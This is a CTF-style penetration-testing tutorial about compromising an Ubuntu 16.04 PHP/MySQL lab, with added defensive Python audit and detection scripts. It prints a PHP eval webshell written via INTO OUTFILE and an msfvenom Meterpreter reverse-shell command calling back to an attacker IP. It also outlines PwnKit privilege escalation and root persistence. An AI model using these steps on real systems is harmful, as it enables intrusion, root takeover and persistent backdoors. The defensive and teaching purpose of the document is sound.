Step‑by‑Step Webshell Upload and Kernel Privilege Escalation on Ubuntu 16.04

This tutorial walks through setting up an Ubuntu 16.04 vulnerable environment, gathering information, uploading a webshell via MySQL into outfile or log injection, establishing a reverse shell with Metasploit, and finally exploiting CVE‑2021‑4034 for kernel privilege escalation, while also covering post‑exploitation persistence techniques.

MaGe Linux Operations

Introduction

After completing two CTF challenges, the author revisits the material to provide a comprehensive reference for beginners tackling internal network penetration, focusing on privilege escalation and omitting code‑audit details.

Target Environment

System: Ubuntu 16.04 (kernel 4.15.0) with a web stack of PHP, MySQL, and ThinkPHP.

Attack Flow

Initial Access

The target is accessed via a browser; the ThinkPHP version is old and typically customized, so direct N‑day exploitation is unlikely. Instead, the focus is on uploading a webshell.

Webshell Upload Process

Information Gathering

A simple directory scan reveals a phpMyAdmin login page, which is brute‑forced to obtain credentials.

MySQL Information

After logging in, check secure_file_priv (NULL or a specific path) and MySQL version to determine if INTO OUTFILE can write files to the web root.

Prerequisites for MySQL‑based Webshell

secure_file_priv is not NULL or points to a writable directory.

The phpMyAdmin directory owner has write permissions on other directories.

magic_quotes_gpc is disabled (default in MySQL 5.3.29+).

Root database user access.

Known target path obtained during reconnaissance.
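The prerequisites above are also the checklist a defender runs against a MySQL host behind a PHP web root. The following audit is an added example, not code from the original article: it takes the rows of SHOW VARIABLES and SHOW GRANTS as plain Python values (the variable names are real MySQL system variables; the sample values are constructed) and reports whether INTO OUTFILE or the query logs could place a file under the web root, and what to change.

```python
"""Audit the MySQL settings that decide whether a database account can write
files under the web root.

Added example, not from the original article. `variables` holds rows from
`SHOW VARIABLES` (real MySQL names), `grants` holds lines from `SHOW GRANTS`,
and the sample values below are constructed. magic_quotes_gpc is a PHP
setting, so it is not part of this MySQL-side check."""

from __future__ import annotations

import os
import re

FILE_PRIV_RE = re.compile(r"\b(ALL PRIVILEGES|FILE)\b", re.I)


def _under(path: str, root: str) -> bool:
    """True when `path` lies inside `root` (or is `root` itself)."""
    path, root = os.path.normpath(path), os.path.normpath(root)
    return path == root or path.startswith(root + os.sep)


def audit_file_write_exposure(variables: dict, grants: list, web_root: str) -> dict:
    """Return {'outfile_possible': bool, 'findings': [(severity, text), ...]}."""
    findings = []

    # 1. secure_file_priv: '' = unrestricted, 'NULL' = import/export disabled,
    #    a path = file writes confined to that directory.
    sfp = variables.get("secure_file_priv", "")
    disabled = sfp is None or str(sfp).upper() == "NULL"
    if disabled:
        findings.append(("info", "secure_file_priv is NULL: INTO OUTFILE and LOAD DATA are disabled"))
    elif sfp == "":
        findings.append(("high", "secure_file_priv is empty: INTO OUTFILE may write anywhere mysqld can"))
    elif _under(sfp, web_root) or _under(web_root, sfp):
        findings.append(("high", f"secure_file_priv={sfp} overlaps the web root {web_root}"))
    else:
        findings.append(("info", f"secure_file_priv confines file writes to {sfp}"))

    # 2. The FILE privilege (or ALL PRIVILEGES) is what INTO OUTFILE requires.
    has_file_priv = any(FILE_PRIV_RE.search(g) for g in grants)
    if has_file_priv:
        findings.append(("medium", "account holds FILE (or ALL) privileges; grant only what the app needs"))

    # 3. Query logs: a log file located under the web root is served by PHP.
    for flag, log_var in (("general_log", "general_log_file"),
                          ("slow_query_log", "slow_query_log_file")):
        if str(variables.get(flag, "OFF")).upper() == "ON":
            path = str(variables.get(log_var, ""))
            sev = "high" if _under(path, web_root) else "medium"
            findings.append((sev, f"{flag} is ON, writing to {path}"))

    return {"outfile_possible": has_file_priv and not disabled, "findings": findings}


# Constructed samples: a weak configuration and a hardened one.
SAMPLE_WEAK = {"secure_file_priv": "", "general_log": "ON",
               "general_log_file": "/var/www/html/mysql.log", "slow_query_log": "OFF"}
SAMPLE_WEAK_GRANTS = ["GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' WITH GRANT OPTION"]
SAMPLE_HARDENED = {"secure_file_priv": "/var/lib/mysql-files", "general_log": "OFF",
                   "slow_query_log": "OFF"}
SAMPLE_HARDENED_GRANTS = ["GRANT SELECT, INSERT, UPDATE ON app.* TO 'app'@'localhost'"]

if __name__ == "__main__":
    for name, vars_, grants in (("weak", SAMPLE_WEAK, SAMPLE_WEAK_GRANTS),
                                ("hardened", SAMPLE_HARDENED, SAMPLE_HARDENED_GRANTS)):
        result = audit_file_write_exposure(vars_, grants, "/var/www/html")
        print(f"[{name}] outfile_possible={result['outfile_possible']}")
        for sev, text in result["findings"]:
            print(f"  {sev:6} {text}")
```

Note that a SUPER-privileged account can change general_log_file at runtime, so the "medium" log finding is only as good as the privilege review in finding 2; setting secure_file_priv to a dedicated directory outside the web root and withholding FILE from application accounts closes both paths.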

Writing the Webshell

Two methods are demonstrated:

SELECT '<?php @eval($_POST[cmd]);?>' INTO OUTFILE '/var/www/html/ruchong.php';

or using general/slow query logs to inject the payload.

Connecting to the Webshell

If function disabling is not in effect, tools like Caidao (菜刀, China Chopper) can be used; otherwise, AntSword (蚁剑) with plugins can bypass restrictions.
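Both write methods leave a recognisable file under the web root, which is where detection starts. The scanner below is an added example, not code from the original article: it flags PHP sources that pass a request parameter into eval() or a command function (the one-liner shown above is the first case) and, for the log-injection method, any non-PHP file in the web root that contains a PHP open tag. The sample files are constructed.

```python
"""Flag PHP sources in a web root that look like one-line webshells, and
non-PHP files (such as query logs) that carry a PHP open tag.

Added example, not from the original article. The patterns cover the
`@eval($_POST[...])` form shown above and a few common variants; the sample
files are constructed."""

from __future__ import annotations

import re
from pathlib import Path

PHP_SUFFIXES = {".php", ".phtml", ".php5", ".php7", ".phar"}
REQUEST_VAR = r"\$_(?:POST|GET|REQUEST|COOKIE)\b"

WEBSHELL_PATTERNS = [
    (re.compile(r"\beval\s*\(\s*" + REQUEST_VAR, re.I),
     "eval() on a request parameter"),
    (re.compile(r"\b(?:assert|system|passthru|shell_exec|exec|popen|proc_open)\s*\(\s*" + REQUEST_VAR, re.I),
     "command/assert function on a request parameter"),
    (re.compile(REQUEST_VAR + r"\[[^\]]*\]\s*\(", re.I),
     "request parameter used as a function name"),
    (re.compile(r"\b(?:eval|assert)\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
     "eval()/assert() on decoded content"),
]
PHP_TAG = re.compile(r"<\?(?:php\b|=)", re.I)


def classify_file(path: str, source: str) -> list:
    """Return the list of reasons this file is suspicious (empty if clean)."""
    reasons = [desc for rx, desc in WEBSHELL_PATTERNS if rx.search(source)]
    if Path(path).suffix.lower() not in PHP_SUFFIXES and PHP_TAG.search(source):
        reasons.append("PHP open tag inside a non-PHP file (log injection indicator)")
    return reasons


def scan_files(files: dict) -> dict:
    """files: {path: source}. Returns {path: reasons} for suspicious entries only."""
    report = {}
    for path, source in files.items():
        reasons = classify_file(path, source)
        if reasons:
            report[path] = reasons
    return report


def scan_web_root(root: str) -> dict:
    """Read every regular file under `root` on a live host and run scan_files over it."""
    files = {}
    for p in Path(root).rglob("*"):
        if p.is_file():
            files[str(p)] = p.read_text(encoding="utf-8", errors="replace")
    return scan_files(files)


# Constructed samples: the one-liner from the article, a benign page, two
# variants, and a query log that ended up under the web root.
SAMPLE_FILES = {
    "/var/www/html/ruchong.php": "<?php @eval($_POST[cmd]);?>",
    "/var/www/html/index.php": "<?php echo htmlspecialchars($_GET['q'] ?? ''); ?>",
    "/var/www/html/assets/helper.php": "<?php $_GET['f']($_GET['a']); ?>",
    "/var/www/html/upload/cache.php": "<?php eval(gzinflate(base64_decode('H4sI'))); ?>",
    "/var/www/html/mysql.log": "2024-01-01T00:00:00\t 12 Query\tSELECT '<?php phpinfo(); ?>'",
}

if __name__ == "__main__":
    for path, reasons in scan_files(SAMPLE_FILES).items():
        print(path)
        for r in reasons:
            print("   -", r)
```

Run scan_web_root("/var/www/html") from cron and diff the report against the previous run; a file integrity monitor over the web root catches the same writes earlier, and web-server logs showing POST requests to a file that never existed in the deployment are the matching network-side signal.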

Privilege Escalation

Kernel Escalation

Preparation

Identify kernel version with uname -a. Search for applicable exploits on Exploit‑DB, Kali’s searchsploit, or GitHub scripts (e.g., linux-exploit-suggester.sh).

Metasploit Payload

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.80.128 LPORT=6666 -f elf > ruchong.elf

Transfer the ELF to the target (e.g., via python3 -m http.server), set execute permissions, and run it to obtain a reverse shell.

Kernel Exploit

Use CVE‑2021‑4034 (PwnKit) script downloaded from GitHub, upload via the webshell, and execute through Metasploit to gain root.

Post‑Exploitation Persistence

Create a new root‑privileged user.

Enable SSH login with a root key pair.

Add a root‑owned cron job.

Deploy a self‑respawning (“undying horse”) or memory‑resident backdoor.

Modify startup scripts.
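Each item in the persistence list leaves a concrete artefact, and a responder checks for all of them at once. The audit below is an added example, not code from the original article: it inspects /etc/passwd for extra UID 0 accounts, /etc/crontab for root jobs launched from scratch directories, root's authorized_keys for unexpected keys, and rc.local for startup entries. The functions take file contents as text so they run against a live host or a mounted image; all sample contents are constructed.

```python
"""Check the artefacts the persistence list above would leave behind:
extra UID 0 accounts, root cron jobs, root's authorized_keys, and rc.local
edits.

Added example, not from the original article. The functions take file
contents as text so they can run against a copied image or a live host;
the samples are constructed."""

from __future__ import annotations

SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


def extra_uid0_accounts(passwd_text: str) -> list:
    """Names of accounts with UID 0 other than root (/etc/passwd format)."""
    names = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 3 and fields[2] == "0" and fields[0] != "root":
            names.append(fields[0])
    return names


def suspicious_root_cron(crontab_text: str) -> list:
    """Root entries in /etc/crontab or /etc/cron.d whose command references a scratch dir."""
    hits = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        if "=" in parts[0]:            # environment assignment such as SHELL=/bin/sh
            continue
        user_idx = 1 if parts[0].startswith("@") else 5   # @reboot vs. five time fields
        if len(parts) <= user_idx + 1 or parts[user_idx] != "root":
            continue
        cmd = " ".join(parts[user_idx + 1:])
        if any(d in cmd for d in SCRATCH_DIRS):
            hits.append(line)
    return hits


def authorized_key_count(keys_text: str) -> int:
    """Number of key lines in an authorized_keys file (comments and blanks ignored)."""
    return sum(1 for l in keys_text.splitlines() if l.strip() and not l.lstrip().startswith("#"))


def audit_persistence(passwd_text: str, crontab_text: str, root_keys_text: str,
                      rc_local_text: str = "") -> list:
    """Return (severity, text) findings across the four artefact sources."""
    findings = []
    for name in extra_uid0_accounts(passwd_text):
        findings.append(("high", f"extra UID 0 account: {name}"))
    for entry in suspicious_root_cron(crontab_text):
        findings.append(("high", f"root cron job runs from a scratch dir: {entry}"))
    n = authorized_key_count(root_keys_text)
    if n:
        findings.append(("medium", f"root authorized_keys holds {n} key(s); confirm each is expected"))
    for line in rc_local_text.splitlines():
        s = line.strip()
        if s and not s.startswith("#") and any(d in s for d in SCRATCH_DIRS):
            findings.append(("high", f"rc.local starts a program from a scratch dir: {s}"))
    return findings


# Constructed samples.
SAMPLE_PASSWD = ("root:x:0:0:root:/root:/bin/bash\n"
                 "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
                 "sysadm:x:0:0::/home/sysadm:/bin/bash\n")
SAMPLE_CRONTAB = ("SHELL=/bin/sh\n"
                  "17 *\t* * *\troot    cd / && run-parts --report /etc/cron.hourly\n"
                  "*/5 * * * * root /tmp/.cache/update.sh\n"
                  "@reboot root /dev/shm/.x\n")
SAMPLE_ROOT_KEYS = "# added by provisioning\nssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAconstructed ops@bastion\n"
SAMPLE_RC_LOCAL = "#!/bin/sh -e\n/var/tmp/.sys/agent &\nexit 0\n"

if __name__ == "__main__":
    for sev, text in audit_persistence(SAMPLE_PASSWD, SAMPLE_CRONTAB, SAMPLE_ROOT_KEYS, SAMPLE_RC_LOCAL):
        print(f"{sev:6} {text}")
```

On a live host, feed the functions the contents of /etc/passwd, /etc/crontab plus each file in /etc/cron.d, /root/.ssh/authorized_keys and /etc/rc.local; the memory-resident backdoor in the list has no file artefact, so pair this with a process listing check (parents of PHP worker processes, listeners on unexpected ports).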

Other Escalation Techniques

The article briefly mentions SUID hunting, sudo abuse, cron exploitation, and MySQL privilege escalation (CVE‑2016‑6663).
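The PwnKit step in the kernel escalation section and the SUID hunting mentioned here come down to the same inventory: which binaries are setuid root, and is /usr/bin/pkexec still one of them. The audit below is an added example, not code from the original article; it reports pkexec while it carries the setuid bit (the documented interim mitigation for CVE‑2021‑4034 before patching policykit‑1 was chmod 0755 /usr/bin/pkexec) and any other setuid‑root file outside an assumed baseline. Entries are (path, st_mode, owner) tuples so it can run over stat output collected from an image; the baseline set and the sample entries are assumptions.

```python
"""Inventory setuid-root binaries and single out pkexec, whose setuid bit is
what CVE-2021-4034 (PwnKit) abuses; removing it (chmod 0755 /usr/bin/pkexec)
was the documented interim mitigation before patching.

Added example, not from the original article. Entries are
(path, st_mode, owner) tuples; BASELINE_SUID is an assumed stock list to
adjust per distribution, and SAMPLE_ENTRIES are constructed."""

from __future__ import annotations

import os
import stat

# Assumed baseline of setuid-root files on a stock Ubuntu 16.04 install; not
# exhaustive, so review any "unexpected" finding before acting on it.
BASELINE_SUID = {
    "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping", "/bin/ping6", "/bin/fusermount",
    "/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/gpasswd",
    "/usr/bin/newgrp", "/usr/bin/pkexec", "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper", "/usr/lib/policykit-1/polkit-agent-helper-1",
}
PKEXEC = "/usr/bin/pkexec"


def is_setuid_root(mode: int, owner: str) -> bool:
    """True for a regular file with the setuid bit set and owned by root."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID) and owner == "root"


def audit_suid(entries: list, baseline: set = BASELINE_SUID) -> list:
    """entries: [(path, st_mode, owner)]. Returns (severity, text) findings."""
    findings = []
    for path, mode, owner in entries:
        if path == PKEXEC:
            if is_setuid_root(mode, owner):
                findings.append(("high", f"{path} is setuid root: patch policykit-1 or "
                                         "drop the bit (chmod 0755) to mitigate CVE-2021-4034"))
            continue
        if is_setuid_root(mode, owner) and path not in baseline:
            findings.append(("medium", f"unexpected setuid-root binary: {path}"))
    return findings


def collect_suid(root: str = "/") -> list:
    """Walk a live filesystem and return (path, mode, owner) for setuid regular files."""
    import pwd  # POSIX only
    out = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            p = os.path.join(dirpath, f)
            try:
                st = os.lstat(p)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                try:
                    owner = pwd.getpwuid(st.st_uid).pw_name
                except KeyError:
                    owner = str(st.st_uid)
                out.append((p, st.st_mode, owner))
    return out


# Constructed sample: an unpatched pkexec, two expected binaries, one stray
# setuid-root file, and a normal executable without the bit.
SAMPLE_ENTRIES = [
    ("/usr/bin/pkexec", 0o104755, "root"),
    ("/usr/bin/sudo", 0o104755, "root"),
    ("/bin/ping", 0o104755, "root"),
    ("/opt/tools/helper", 0o104755, "root"),
    ("/usr/bin/python3", 0o100755, "root"),
]

if __name__ == "__main__":
    for sev, text in audit_suid(SAMPLE_ENTRIES):
        print(f"{sev:6} {text}")
```

Run audit_suid(collect_suid()) on the host and keep the output as a baseline; a new setuid-root file appearing between runs is the signal the "SUID hunting" technique relies on, seen from the other side.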

Conclusion

The article provides a detailed walkthrough of internal network exploitation, from initial reconnaissance to webshell deployment, reverse‑shell establishment, kernel privilege escalation, and persistence. Future posts will cover lateral movement, advanced post‑exploitation, and platform‑specific escalation.

Written by

MaGe Linux Operations

Founded in 2009, MaGe Education is a top Chinese high‑end IT training brand. Its graduates earn 12K+ RMB salaries, and the school has trained tens of thousands of students. It offers high‑pay courses in Linux cloud operations, Python full‑stack, automation, data analysis, AI, and Go high‑concurrency architecture. Thanks to quality courses and a solid reputation, it has talent partnerships with numerous internet firms.